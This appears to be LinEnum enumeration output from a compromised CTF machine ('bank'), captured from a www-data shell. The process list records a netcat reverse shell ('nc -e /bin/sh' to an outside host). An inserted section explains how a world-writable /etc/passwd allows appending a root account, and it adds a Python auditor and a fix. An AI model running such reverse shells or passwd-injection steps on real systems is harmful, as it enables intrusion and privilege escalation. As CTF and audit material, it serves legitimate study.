- #########################################################
- # Local Linux Enumeration & Privilege Escalation Script #
- #########################################################
- # www.rebootuser.com
- #
- Debug Info
- thorough tests = enabled
- Scan started at:
- Tue Sep 19 03:15:16 EEST 2017
- ### SYSTEM ##############################################
- Kernel information:
- Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 i686 i686 GNU/Linux
- Kernel information (continued):
- Linux version 4.4.0-79-generic (buildd@lcy01-30) (gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3) ) #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017
- Specific release information:
- DISTRIB_ID=Ubuntu
- DISTRIB_RELEASE=14.04
- DISTRIB_CODENAME=trusty
- DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
- NAME="Ubuntu"
- VERSION="14.04.5 LTS, Trusty Tahr"
- ID=ubuntu
- ID_LIKE=debian
- PRETTY_NAME="Ubuntu 14.04.5 LTS"
- VERSION_ID="14.04"
- HOME_URL="http://www.ubuntu.com/"
- SUPPORT_URL="http://help.ubuntu.com/"
- BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
- Hostname:
- bank
- ### USER/GROUP ##########################################
- Current user/group info:
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- Users that have previously logged onto the system:
- Username Port From Latest
- root tty1 Fri Jun 16 07:44:56 +0300 2017
- chris pts/0 192.168.147.1 Sun May 28 22:16:12 +0300 2017
- Who else is logged on:
- 03:15:16 up 16:14, 0 users, load average: 0.00, 0.01, 0.00
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- Group memberships:
- uid=0(root) gid=0(root) groups=0(root)
- uid=1(daemon) gid=1(daemon) groups=1(daemon)
- uid=2(bin) gid=2(bin) groups=2(bin)
- uid=3(sys) gid=3(sys) groups=3(sys)
- uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
- uid=5(games) gid=60(games) groups=60(games)
- uid=6(man) gid=12(man) groups=12(man)
- uid=7(lp) gid=7(lp) groups=7(lp)
- uid=8(mail) gid=8(mail) groups=8(mail)
- uid=9(news) gid=9(news) groups=9(news)
- uid=10(uucp) gid=10(uucp) groups=10(uucp)
- uid=13(proxy) gid=13(proxy) groups=13(proxy)
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- uid=34(backup) gid=34(backup) groups=34(backup)
- uid=38(list) gid=38(list) groups=38(list)
- uid=39(irc) gid=39(irc) groups=39(irc)
- uid=41(gnats) gid=41(gnats) groups=41(gnats)
- uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
- uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
- uid=101(syslog) gid=104(syslog) groups=104(syslog),4(adm)
- uid=102(messagebus) gid=106(messagebus) groups=106(messagebus)
- uid=103(landscape) gid=109(landscape) groups=109(landscape)
- uid=1000(chris) gid=1000(chris) groups=1000(chris),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
- uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
- uid=105(bind) gid=112(bind) groups=112(bind)
- uid=106(mysql) gid=114(mysql) groups=114(mysql)
- Sample entries from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
- root:x:0:0:root:/root:/bin/bash
- chris:x:1000:1000:chris,,,:/home/chris:/bin/bash
- Super user account(s):
- root
- Are permissions on /home directories lax:
- total 12K
- drwxr-xr-x 3 root root 4.0K May 28 22:13 .
- drwxr-xr-x 21 root root 4.0K Jun 15 08:12 ..
- drwxr-xr-x 3 chris chris 4.0K Jun 14 18:21 chris
- Files not owned by user but writable by group:
- -rw-rw-rw- 1 root root 1252 May 28 22:40 /etc/passwd
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.remove
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.replace
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.load
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.remove
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.replace
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.load
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_name
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_level
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_stacked
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.stacked
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.access
- World-readable files within /home:
- -rw-r--r-- 1 chris chris 675 May 28 22:13 /home/chris/.profile
- -rw-r--r-- 1 chris chris 3637 May 28 22:13 /home/chris/.bashrc
- -rw-rw-r-- 1 chris chris 33 May 29 14:52 /home/chris/user.txt
- -rw-r--r-- 1 chris chris 220 May 28 22:13 /home/chris/.bash_logout
- Home directory contents:
- total 16K
- drwxr-xr-x 4 root root 4.0K May 28 22:48 .
- drwxr-xr-x 14 root root 4.0K May 29 18:41 ..
- drwxr-xr-x 6 www-data www-data 4.0K Jun 15 09:21 bank
- drwxr-xr-x 2 root root 4.0K Jun 14 18:02 html
- Root is allowed to login via SSH:
- PermitRootLogin yes
- ### ENVIRONMENTAL #######################################
- Environment information:
- APACHE_PID_FILE=/var/run/apache2/apache2.pid
- APACHE_RUN_USER=www-data
- APACHE_LOG_DIR=/var/log/apache2
- PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- PWD=/var/www/bank/uploads
- APACHE_RUN_GROUP=www-data
- LANG=C
- SHLVL=1
- APACHE_LOCK_DIR=/var/lock/apache2
- APACHE_RUN_DIR=/var/run/apache2
- _=/usr/bin/env
- Path information:
- /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- Available shells:
- # /etc/shells: valid login shells
- /bin/sh
- /bin/dash
- /bin/bash
- /bin/rbash
- /usr/bin/tmux
- /usr/bin/screen
- Current umask value:
- 0022
- u=rwx,g=rx,o=rx
- umask value as specified in /etc/login.defs:
- UMASK 022
- Password and storage information:
- PASS_MAX_DAYS 99999
- PASS_MIN_DAYS 0
- PASS_WARN_AGE 7
- ENCRYPT_METHOD SHA512
- ### JOBS/TASKS ##########################################
- Cron jobs:
- -rw-r--r-- 1 root root 722 Feb 9 2013 /etc/crontab
- /etc/cron.d:
- total 16
- drwxr-xr-x 2 root root 4096 May 28 22:40 .
- drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
- -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
- -rw-r--r-- 1 root root 510 Feb 9 2017 php5
- /etc/cron.daily:
- total 76
- drwxr-xr-x 2 root root 4096 Jun 15 08:12 .
- drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
- -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
- -rwxr-xr-x 1 root root 625 May 9 19:15 apache2
- -rwxr-xr-x 1 root root 376 Apr 4 2014 apport
- -rwxr-xr-x 1 root root 15481 Apr 10 2014 apt
- -rwxr-xr-x 1 root root 314 Feb 18 2014 aptitude
- -rwxr-xr-x 1 root root 355 Jun 4 2013 bsdmainutils
- -rwxr-xr-x 1 root root 256 Mar 7 2014 dpkg
- -rwxr-xr-x 1 root root 372 Jan 22 2014 logrotate
- -rwxr-xr-x 1 root root 1261 Sep 23 2014 man-db
- -rwxr-xr-x 1 root root 435 Jun 20 2013 mlocate
- -rwxr-xr-x 1 root root 249 Feb 17 2014 passwd
- -rwxr-xr-x 1 root root 2417 May 13 2013 popularity-contest
- -rwxr-xr-x 1 root root 214 Oct 7 2014 update-notifier-common
- -rwxr-xr-x 1 root root 328 Jul 18 2014 upstart
- /etc/cron.hourly:
- total 12
- drwxr-xr-x 2 root root 4096 May 28 21:51 .
- drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
- -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
- /etc/cron.monthly:
- total 12
- drwxr-xr-x 2 root root 4096 May 28 21:51 .
- drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
- -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
- /etc/cron.weekly:
- total 28
- drwxr-xr-x 2 root root 4096 Jun 15 08:12 .
- drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
- -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
- -rwxr-xr-x 1 root root 730 Feb 23 2014 apt-xapian-index
- -rwxr-xr-x 1 root root 427 Apr 16 2014 fstrim
- -rwxr-xr-x 1 root root 771 Sep 23 2014 man-db
- -rwxr-xr-x 1 root root 211 Oct 7 2014 update-notifier-common
- Crontab contents:
- # /etc/crontab: system-wide crontab
- # Unlike any other crontab you don't have to run the `crontab'
- # command to install the new version when you edit this file
- # and files in /etc/cron.d. These files also have username fields,
- # that none of the other crontabs do.
- SHELL=/bin/sh
- PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
- # m h dom mon dow user command
- 17 * * * * root cd / && run-parts --report /etc/cron.hourly
- 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
- 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
- 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
- #
- ### NETWORKING ##########################################
- Network & IP info:
- eth0 Link encap:Ethernet HWaddr 00:50:56:aa:b1:0c
- inet addr:10.10.10.29 Bcast:10.10.10.255 Mask:255.255.255.0
- inet6 addr: fe80::250:56ff:feaa:b10c/64 Scope:Link
- inet6 addr: dead:beef::250:56ff:feaa:b10c/64 Scope:Global
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:6318125 errors:4580 dropped:8585 overruns:0 frame:0
- TX packets:6275341 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:1581182731 (1.5 GB) TX bytes:1177779161 (1.1 GB)
- Interrupt:19 Base address:0x2000
- lo Link encap:Local Loopback
- inet addr:127.0.0.1 Mask:255.0.0.0
- inet6 addr: ::1/128 Scope:Host
- UP LOOPBACK RUNNING MTU:65536 Metric:1
- RX packets:3373 errors:0 dropped:0 overruns:0 frame:0
- TX packets:3373 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1
- RX bytes:347776 (347.7 KB) TX bytes:347776 (347.7 KB)
- ARP history:
- ? (10.10.10.2) at 00:50:56:aa:e6:4b [ether] on eth0
- Nameserver(s):
- nameserver 10.10.10.29
- nameserver 192.168.1.7
- Default route:
- default 10.10.10.2 0.0.0.0 UG 0 0 0 eth0
- Listening TCP:
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 10.10.10.29:53 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
- tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
- tcp 0 0 10.10.10.29:41626 10.10.14.3:6969 ESTABLISHED 2203/sh
- tcp6 0 0 :::80 :::* LISTEN -
- tcp6 0 0 :::53 :::* LISTEN -
- tcp6 0 0 :::22 :::* LISTEN -
- tcp6 0 0 ::1:953 :::* LISTEN -
- tcp6 0 0 10.10.10.29:80 10.10.14.3:57208 TIME_WAIT -
- tcp6 0 0 10.10.10.29:80 10.10.14.3:57204 TIME_WAIT -
- tcp6 0 0 10.10.10.29:80 10.10.14.3:57168 ESTABLISHED -
- Listening UDP:
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- udp 0 0 10.10.10.29:53 0.0.0.0:* -
- udp 0 0 127.0.0.1:53 0.0.0.0:* -
- udp6 0 0 :::53 :::* -
- ### SERVICES #############################################
- Running processes:
- USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
- root 1 0.0 0.2 4312 2508 ? Ss Sep18 0:01 /sbin/init
- root 2 0.0 0.0 0 0 ? S Sep18 0:00 [kthreadd]
- root 3 0.0 0.0 0 0 ? S Sep18 0:50 [ksoftirqd/0]
- root 5 0.0 0.0 0 0 ? S< Sep18 0:00 [kworker/0:0H]
- root 7 0.0 0.0 0 0 ? S Sep18 0:02 [rcu_sched]
- root 8 0.0 0.0 0 0 ? S Sep18 0:00 [rcu_bh]
- root 9 0.0 0.0 0 0 ? S Sep18 0:00 [migration/0]
- root 10 0.0 0.0 0 0 ? S Sep18 0:00 [watchdog/0]
- root 11 0.0 0.0 0 0 ? S Sep18 0:00 [kdevtmpfs]
- root 12 0.0 0.0 0 0 ? S< Sep18 0:00 [netns]
- root 13 0.0 0.0 0 0 ? S< Sep18 0:00 [perf]
- root 14 0.0 0.0 0 0 ? S Sep18 0:00 [khungtaskd]
- root 15 0.0 0.0 0 0 ? S< Sep18 0:00 [writeback]
- root 16 0.0 0.0 0 0 ? SN Sep18 0:00 [ksmd]
- root 17 0.0 0.0 0 0 ? SN Sep18 0:00 [khugepaged]
- root 18 0.0 0.0 0 0 ? S< Sep18 0:00 [crypto]
- root 19 0.0 0.0 0 0 ? S< Sep18 0:00 [kintegrityd]
- root 20 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 21 0.0 0.0 0 0 ? S< Sep18 0:00 [kblockd]
- root 22 0.0 0.0 0 0 ? S< Sep18 0:00 [ata_sff]
- root 23 0.0 0.0 0 0 ? S< Sep18 0:00 [md]
- root 24 0.0 0.0 0 0 ? S< Sep18 0:00 [devfreq_wq]
- root 26 0.0 0.0 0 0 ? S Sep18 0:06 [kworker/0:1]
- root 28 0.0 0.0 0 0 ? S Sep18 0:01 [kswapd0]
- root 29 0.0 0.0 0 0 ? S< Sep18 0:00 [vmstat]
- root 30 0.0 0.0 0 0 ? S Sep18 0:00 [fsnotify_mark]
- root 31 0.0 0.0 0 0 ? S Sep18 0:00 [ecryptfs-kthrea]
- root 47 0.0 0.0 0 0 ? S< Sep18 0:00 [kthrotld]
- root 48 0.0 0.0 0 0 ? S< Sep18 0:00 [acpi_thermal_pm]
- root 49 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 50 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 52 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 53 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 54 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 55 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 56 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 57 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 58 0.0 0.0 0 0 ? S Sep18 0:00 [scsi_eh_0]
- root 59 0.0 0.0 0 0 ? S< Sep18 0:00 [scsi_tmf_0]
- root 60 0.0 0.0 0 0 ? S Sep18 0:00 [scsi_eh_1]
- root 61 0.0 0.0 0 0 ? S< Sep18 0:00 [scsi_tmf_1]
- root 64 0.0 0.0 0 0 ? S< Sep18 0:00 [ipv6_addrconf]
- root 77 0.0 0.0 0 0 ? S< Sep18 0:00 [deferwq]
- root 78 0.0 0.0 0 0 ? S< Sep18 0:00 [charger_manager]
- root 80 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 81 0.0 0.0 0 0 ? S Sep18 0:00 [kworker/0:2]
- root 136 0.0 0.0 0 0 ? S< Sep18 0:00 [kworker/0:1H]
- root 137 0.0 0.0 0 0 ? S< Sep18 0:00 [kpsmoused]
- root 138 0.0 0.0 0 0 ? S< Sep18 0:00 [mpt_poll_0]
- root 139 0.0 0.0 0 0 ? S< Sep18 0:00 [mpt/0]
- root 141 0.0 0.0 0 0 ? S Sep18 0:00 [scsi_eh_2]
- root 142 0.0 0.0 0 0 ? S< Sep18 0:00 [scsi_tmf_2]
- root 143 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 169 0.0 0.0 0 0 ? S Sep18 0:00 [jbd2/sda1-8]
- root 170 0.0 0.0 0 0 ? S< Sep18 0:00 [ext4-rsv-conver]
- root 299 0.0 0.1 3160 1312 ? S Sep18 0:00 upstart-udev-bridge --daemon
- root 303 0.0 0.1 12356 1948 ? Ss Sep18 0:00 /lib/systemd/systemd-udevd --daemon
- message+ 366 0.0 0.1 4268 1144 ? Ss Sep18 0:00 dbus-daemon --system --fork
- root 393 0.0 0.1 3996 1664 ? Ss Sep18 0:00 /lib/systemd/systemd-logind
- syslog 407 0.0 0.1 30492 1780 ? Ssl Sep18 0:00 rsyslogd
- root 436 0.0 0.1 3164 1044 ? S Sep18 0:00 upstart-file-bridge --daemon
- root 479 0.0 0.0 0 0 ? S< Sep18 0:00 [ttm_swap]
- root 649 0.0 0.0 2888 4 ? S Sep18 0:00 upstart-socket-bridge --daemon
- root 781 0.0 0.1 4660 1728 tty4 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty4
- root 784 0.0 0.1 4660 1688 tty5 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty5
- root 789 0.0 0.1 4660 1724 tty2 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty2
- root 790 0.0 0.1 4660 1732 tty3 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty3
- root 793 0.0 0.1 4660 1592 tty6 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty6
- root 826 0.0 0.2 7828 2760 ? Ss Sep18 0:00 /usr/sbin/sshd -D
- daemon 827 0.0 0.0 2656 0 ? Ss Sep18 0:00 atd
- root 828 0.0 0.1 3068 1904 ? Ss Sep18 0:00 cron
- root 875 0.0 0.1 2212 1356 ? Ss Sep18 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
- mysql 909 0.0 3.4 327756 35612 ? Ssl Sep18 0:23 /usr/sbin/mysqld
- bind 936 0.0 1.3 46152 13416 ? Ssl Sep18 0:01 /usr/sbin/named -u bind
- root 1025 0.0 1.6 103516 16616 ? Ss Sep18 0:03 /usr/sbin/apache2 -k start
- www-data 1028 0.0 0.3 21540 3544 ? S Sep18 0:01 /usr/sbin/apache2 -k start
- root 1074 0.0 0.1 4660 1824 tty1 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty1
- root 1197 0.0 0.0 0 0 ? S Sep18 0:00 [kauditd]
- www-data 2047 0.0 0.5 103588 5656 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2061 0.0 0.9 103604 9428 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2065 0.0 1.1 103720 11348 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2111 0.0 1.0 103736 10768 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2116 0.0 0.6 103596 6864 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2119 0.0 0.5 103588 5656 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2124 0.0 0.9 103596 9568 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2132 0.0 0.9 103588 9816 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2164 0.0 0.9 103588 9812 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2177 0.0 1.0 103588 10360 ? S 02:19 0:00 /usr/sbin/apache2 -k start
- root 2198 0.0 0.0 0 0 ? S 02:54 0:00 [kworker/u16:0]
- root 2201 0.0 0.0 0 0 ? S 03:02 0:00 [kworker/u16:2]
- www-data 2202 0.0 0.0 2284 628 ? S 03:06 0:00 sh -c nc -e /bin/sh 10.10.14.3 6969
- www-data 2203 0.0 0.1 2284 1368 ? S 03:06 0:00 sh
- www-data 3430 0.3 0.2 3512 2840 ? S 03:15 0:00 /bin/bash ./escalate.sh -t
- www-data 3762 0.0 0.1 3504 1956 ? S 03:15 0:00 /bin/bash ./escalate.sh -t
- www-data 3763 0.0 0.1 3156 1968 ? R 03:15 0:00 ps aux
- Process binaries & associated permissions (from above list):
- -rwxr-xr-x 1 root root 986672 May 16 15:54 /bin/bash
- -rwxr-xr-x 1 root root 259552 Feb 7 2017 /lib/systemd/systemd-logind
- -rwxr-xr-x 1 root root 235064 Feb 7 2017 /lib/systemd/systemd-udevd
- -rwxr-xr-x 2 root root 26756 Nov 24 2016 /sbin/getty
- -rwxr-xr-x 1 root root 252080 Jul 18 2014 /sbin/init
- -rwxr-xr-x 1 root root 597796 May 9 19:16 /usr/sbin/apache2
- -rwxr-xr-x 1 root root 10724544 Apr 25 19:57 /usr/sbin/mysqld
- -rwxr-xr-x 1 root root 573516 Apr 13 11:12 /usr/sbin/named
- -rwxr-xr-x 1 root root 834648 Aug 11 2016 /usr/sbin/sshd
- /etc/init.d/ binary permissions:
- total 200
- drwxr-xr-x 2 root root 4096 Jun 15 08:12 .
- drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
- -rw-r--r-- 1 root root 0 Aug 3 2016 .legacy-bootordering
- -rw-r--r-- 1 root root 2427 Mar 13 2014 README
- -rwxr-xr-x 1 root root 2243 Apr 3 2014 acpid
- -rwxr-xr-x 1 root root 9974 Jan 7 2014 apache2
- -rwxr-xr-x 1 root root 4125 Mar 16 2017 apparmor
- -rwxr-xr-x 1 root root 2801 May 18 2016 apport
- -rwxrwxr-x 1 root root 1071 Sep 8 2013 atd
- -rwxr-xr-x 1 root root 3451 Apr 13 11:07 bind9
- -rwxr-xr-x 1 root root 1919 Jan 18 2011 console-setup
- lrwxrwxrwx 1 root root 21 May 28 21:51 cron -> /lib/init/upstart-job
- -rwxr-xr-x 1 root root 2813 Nov 25 2014 dbus
- -rwxr-xr-x 1 root root 1217 Mar 7 2013 dns-clean
- lrwxrwxrwx 1 root root 21 Mar 14 2012 friendly-recovery -> /lib/init/upstart-job
- -rwxr-xr-x 1 root root 1105 May 13 2015 grub-common
- -rwxr-xr-x 1 root root 1329 Mar 13 2014 halt
- -rwxr-xr-x 1 root root 1864 Nov 12 2012 irqbalance
- -rwxr-xr-x 1 root root 1293 Mar 13 2014 killprocs
- -rwxr-xr-x 1 root root 1990 Jan 22 2013 kmod
- -rwxr-xr-x 1 root root 5491 Feb 19 2014 mysql
- -rwxr-xr-x 1 root root 4479 Mar 20 2014 networking
- -rwxr-xr-x 1 root root 1581 Feb 17 2016 ondemand
- -rwxr-xr-x 1 root root 561 Apr 21 2015 pppd-dns
- -rwxr-xr-x 1 root root 1192 May 27 2013 procps
- -rwxr-xr-x 1 root root 6120 Mar 13 2014 rc
- -rwxr-xr-x 1 root root 782 Mar 13 2014 rc.local
- -rwxr-xr-x 1 root root 117 Mar 13 2014 rcS
- -rwxr-xr-x 1 root root 639 Mar 13 2014 reboot
- -rwxr-xr-x 1 root root 2918 Jun 13 2014 resolvconf
- -rwxr-xr-x 1 root root 4395 Jan 20 2016 rsync
- -rwxr-xr-x 1 root root 2913 Dec 4 2013 rsyslog
- -rwxr-xr-x 1 root root 1226 Jul 22 2013 screen-cleanup
- -rwxr-xr-x 1 root root 3920 Mar 13 2014 sendsigs
- -rwxr-xr-x 1 root root 590 Mar 13 2014 single
- -rw-r--r-- 1 root root 4290 Mar 13 2014 skeleton
- -rwxr-xr-x 1 root root 4077 May 2 2014 ssh
- -rwxr-xr-x 1 root root 731 Feb 5 2014 sudo
- -rwxr-xr-x 1 root root 6173 Apr 14 2014 udev
- -rwxr-xr-x 1 root root 2721 Mar 13 2014 umountfs
- -rwxr-xr-x 1 root root 2260 Mar 13 2014 umountnfs.sh
- -rwxr-xr-x 1 root root 1872 Mar 13 2014 umountroot
- -rwxr-xr-x 1 root root 1361 Dec 6 2013 unattended-upgrades
- -rwxr-xr-x 1 root root 3111 Mar 13 2014 urandom
- ### SOFTWARE #############################################
- Sudo version:
- Sudo version 1.8.9p5
- MySQL version:
- mysql Ver 14.14 Distrib 5.5.55, for debian-linux-gnu (i686) using readline 6.3
- Apache version:
- Server version: Apache/2.4.7 (Ubuntu)
- Server built: May 9 2017 16:13:38
- Apache user configuration:
- APACHE_RUN_USER=www-data
- APACHE_RUN_GROUP=www-data
- Installed Apache modules:
- Loaded Modules:
- core_module (static)
- so_module (static)
- watchdog_module (static)
- http_module (static)
- log_config_module (static)
- logio_module (static)
- version_module (static)
- unixd_module (static)
- access_compat_module (shared)
- alias_module (shared)
- auth_basic_module (shared)
- authn_core_module (shared)
- authn_file_module (shared)
- authz_core_module (shared)
- authz_host_module (shared)
- authz_user_module (shared)
- autoindex_module (shared)
- deflate_module (shared)
- dir_module (shared)
- env_module (shared)
- fcgid_module (shared)
- filter_module (shared)
- include_module (shared)
- mime_module (shared)
- mpm_prefork_module (shared)
- negotiation_module (shared)
- php5_module (shared)
- rewrite_module (shared)
- setenvif_module (shared)
- status_module (shared)
- suexec_module (shared)
- ### INTERESTING FILES ####################################
- Useful file locations:
- /bin/nc
- /bin/netcat
- /usr/bin/wget
- /usr/bin/nmap
- /usr/bin/gcc
- Installed compilers:
- ii g++ 4:4.8.2-1ubuntu6 i386 GNU C++ compiler
- ii g++-4.8 4.8.4-2ubuntu1~14.04.3 i386 GNU C++ compiler
- ii gcc 4:4.8.2-1ubuntu6 i386 GNU C compiler
- ii gcc-4.8 4.8.4-2ubuntu1~14.04.3 i386 GNU C compiler
- Can we read/write sensitive files:
- -rw-rw-rw- 1 root root 1252 May 28 22:40 /etc/passwd
- -rw-r--r-- 1 root root 707 May 28 22:40 /etc/group
- -rw-r--r-- 1 root root 665 Feb 20 2014 /etc/profile
- -rw-r----- 1 root shadow 895 Jun 14 18:16 /etc/shadow
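The one line in this section that matters is `-rw-rw-rw- 1 root root 1252 May 28 22:40 /etc/passwd`: the file is world-writable, so the unprivileged www-data shell this scan runs from can append a second uid 0 account. The check below is an added example, not LinEnum code: it takes the `ls -l` mode string and the passwd content, flags the world-writable bit, any uid 0 entry other than root, empty password fields, and hashes stored in /etc/passwd rather than /etc/shadow. The sample passwd text is constructed: the root and chris lines mirror the report, the daemon and www-data lines are invented, and the `backdoor` line is a hypothetical entry of the kind an attacker would append (its hash is a placeholder string, not a real crypt hash).

```python
"""Audit /etc/passwd for the weaknesses behind the finding above.

Added example, not part of the LinEnum output or project. SAMPLE_MODE is the
mode LinEnum reported for /etc/passwd; SAMPLE_PASSWD is constructed (the
'backdoor' entry is hypothetical and its hash is a placeholder).
"""
from dataclasses import dataclass

SAMPLE_MODE = "-rw-rw-rw-"
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
chris:x:1000:1000:chris,,,:/home/chris:/bin/bash
backdoor:$1$saltsalt$PLACEHOLDERhashPLACEHOLDER:0:0::/root:/bin/bash
"""


@dataclass
class Finding:
    severity: str
    user: str
    detail: str


def parse_passwd(text):
    """Split passwd content into entry dicts; malformed lines are kept and flagged."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        try:
            if len(fields) != 7:
                raise ValueError("expected 7 colon-separated fields")
            entries.append({
                "name": fields[0], "pw": fields[1],
                "uid": int(fields[2]), "gid": int(fields[3]),
                "gecos": fields[4], "home": fields[5], "shell": fields[6],
            })
        except ValueError:
            entries.append({"malformed": raw})
    return entries


def audit_passwd(mode, text):
    """Return Findings for an `ls -l` mode string and the file's content."""
    findings = []
    # In a 10-character mode string, index 8 is the 'other' write bit.
    if len(mode) == 10 and mode[8] == "w":
        findings.append(Finding("critical", "-",
                                f"/etc/passwd is world-writable ({mode}): any local "
                                "user can append an entry"))
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append(Finding("medium", "-", f"malformed line: {e['malformed']!r}"))
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(Finding("critical", e["name"], "additional uid 0 account"))
        if e["pw"] == "":
            findings.append(Finding("critical", e["name"],
                                    "empty password field: login needs no password"))
        elif e["pw"] not in ("x", "*") and not e["pw"].startswith("!"):
            # A hash here is world-readable and is used for authentication
            # instead of the account's /etc/shadow entry.
            findings.append(Finding("high", e["name"], "password hash stored in /etc/passwd"))
    return findings


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_MODE, SAMPLE_PASSWD):
        print(f"[{f.severity}] {f.user}: {f.detail}")
```

Why the `backdoor` line is rated critical: with write access, an attacker only needs a crypt hash of a password they know (for example from `openssl passwd -1`) placed in field 2 of a new line with uid and gid 0, after which `su backdoor` gives a root shell without touching /etc/shadow at all. The fix on the host is `chmod 644 /etc/passwd`, followed by a check for any line the attacker may already have added.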
- SUID files:
- -rwsr-xr-x 1 root root 112204 Jun 14 18:27 /var/htb/bin/emergency
- -rwsr-xr-x 1 root root 5480 Mar 27 18:34 /usr/lib/eject/dmcrypt-get-device
- -rwsr-xr-x 1 root root 492972 Aug 11 2016 /usr/lib/openssh/ssh-keysign
- -rwsr-xr-- 1 root messagebus 333952 Dec 7 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
- -rwsr-xr-x 1 root root 9808 Nov 24 2015 /usr/lib/policykit-1/polkit-agent-helper-1
- -rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
- -rwsr-xr-x 1 root root 35916 May 17 02:38 /usr/bin/chsh
